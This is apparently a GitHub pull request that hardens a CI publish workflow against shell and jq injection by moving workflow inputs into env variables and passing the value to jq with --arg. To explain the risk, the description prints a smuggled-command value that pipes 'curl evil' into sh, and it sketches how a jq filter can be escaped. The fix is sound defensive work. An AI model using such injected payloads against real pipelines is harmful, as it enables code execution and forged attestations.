### PR TITLE
fix(ci): harden publish.yml input handling — env var + jq --arg

### DIFF
--- a/.github/workflows/publish.yml
+++ b/.github/workflows/publish.yml
@@ -38,6 +38,9 @@ jobs:
     steps:
       - name: Resolve Python package matrix
         id: resolve
+        env:
+          INPUT: ${{ github.event.inputs.package }}
+          EVENT_NAME: ${{ github.event_name }}
         run: |
           # Complete list of publishable Python packages (41 packages)
           ALL='[
@@ -86,12 +89,19 @@ jobs:
           # Compact the JSON
           ALL=$(echo "$ALL" | jq -c '.')
 
-          INPUT="${{ github.event.inputs.package }}"
-          if [ "${{ github.event_name }}" = "release" ] || [ "$INPUT" = "all" ] || [ "$INPUT" = "all-python" ]; then
+          # $INPUT and $EVENT_NAME come from the step env block, not
+          # from a GHA expression interpolated into the shell body, so
+          # an attacker-controlled inputs.package cannot break out into
+          # an injected shell command. Same hardening on the jq filter
+          # below: pass $INPUT as a jq variable via --arg rather than
+          # into the program text, so quote characters in the input
+          # cannot break out of the string and execute attacker-
+          # controlled jq.
+          if [ "$EVENT_NAME" = "release" ] || [ "$INPUT" = "all" ] || [ "$INPUT" = "all-python" ]; then
             echo "matrix={\"include\":$ALL}" >> "$GITHUB_OUTPUT"
             echo "any=true" >> "$GITHUB_OUTPUT"
           elif [ -n "$INPUT" ] && [ "$INPUT" != "agent-governance-dotnet" ]; then
-            FILTERED=$(echo "$ALL" | jq -c "[.[] | select(.name == \"$INPUT\")]")
+            FILTERED=$(echo "$ALL" | jq -c --arg name "$INPUT" '[.[] | select(.name == $name)]')
             if [ "$FILTERED" = "[]" ]; then
               echo "::error::Unknown package '$INPUT'. Run with 'all' to see available packages."
               echo "any=false" >> "$GITHUB_OUTPUT"


### PR DESCRIPTION
## Summary

[`resolve-python-matrix`](.github/workflows/publish.yml) interpolated two GHA contexts directly into a shell ``run:`` body, and used the workflow input as a **jq program fragment**:

````bash
INPUT=\"\${{ github.event.inputs.package }}\"
if [ \"\${{ github.event_name }}\" = \"release\" ] || ...
FILTERED=$(echo \"$ALL\" | jq -c \"[.[] | select(.name == \\\"$INPUT\\\")]\")
````

## Risk

* ``inputs.package`` is workflow_dispatch input — attacker-controllable by anyone who can dispatch the workflow (typically write-access actors). The literal interpolation pattern would let a value like ``\"; curl evil | sh; #`` execute arbitrary shell.
* The jq filter is worse: ``INPUT`` lands inside a jq string literal, but a value containing ``\"); ...`` would close the jq string, insert arbitrary jq syntax, and re-open. jq can execute OS commands via ``[env, $expr] | @sh | sh`` patterns and emit arbitrary JSON output that the downstream matrix step trusts.

The blast radius is meaningful: this workflow holds ``id-token: write`` and ``attestations: write``, so a successful jq-injection can forge package attestations against the project's identity.

## Change

* Move ``INPUT`` and ``EVENT_NAME`` into the step's ``env:`` block. The shell references ``$INPUT`` / ``$EVENT_NAME``; the GHA expression engine no longer touches the ``run:`` body.

````yaml
- name: Resolve Python package matrix
  id: resolve
  env:
    INPUT: \${{ github.event.inputs.package }}
    EVENT_NAME: \${{ github.event_name }}
  run: |
    ...
````

* Switch jq to ``--arg``:

````bash
FILTERED=$(echo \"$ALL\" | jq -c --arg name \"$INPUT\" '[.[] | select(.name == \$name)]')
````

jq variables passed via ``--arg`` are typed as strings — they cannot break out into program text even if the value contains backslashes, quotes, or jq operators.

## Tests

Workflow YAML; no local test harness. Behaviour is unchanged for any legitimate package name (``\"all\"``, ``\"all-python\"``, or a specific package). Verified via the project's existing ``workflow-lint.yml`` (the prior CODEOWNERS rule routes this PR to the same maintainers).

## Test plan

- [ ] CI passes
- [ ] Dispatching with ``package: agent-os`` continues to publish only ``agent-os``
- [ ] Dispatching with ``package: all`` continues to publish everything

---

Surfaced during independent audit conducted by @finnoybu (Ken Tannenbaum, AEGIS Initiative); [MEDIUM, Infrastructure/CI].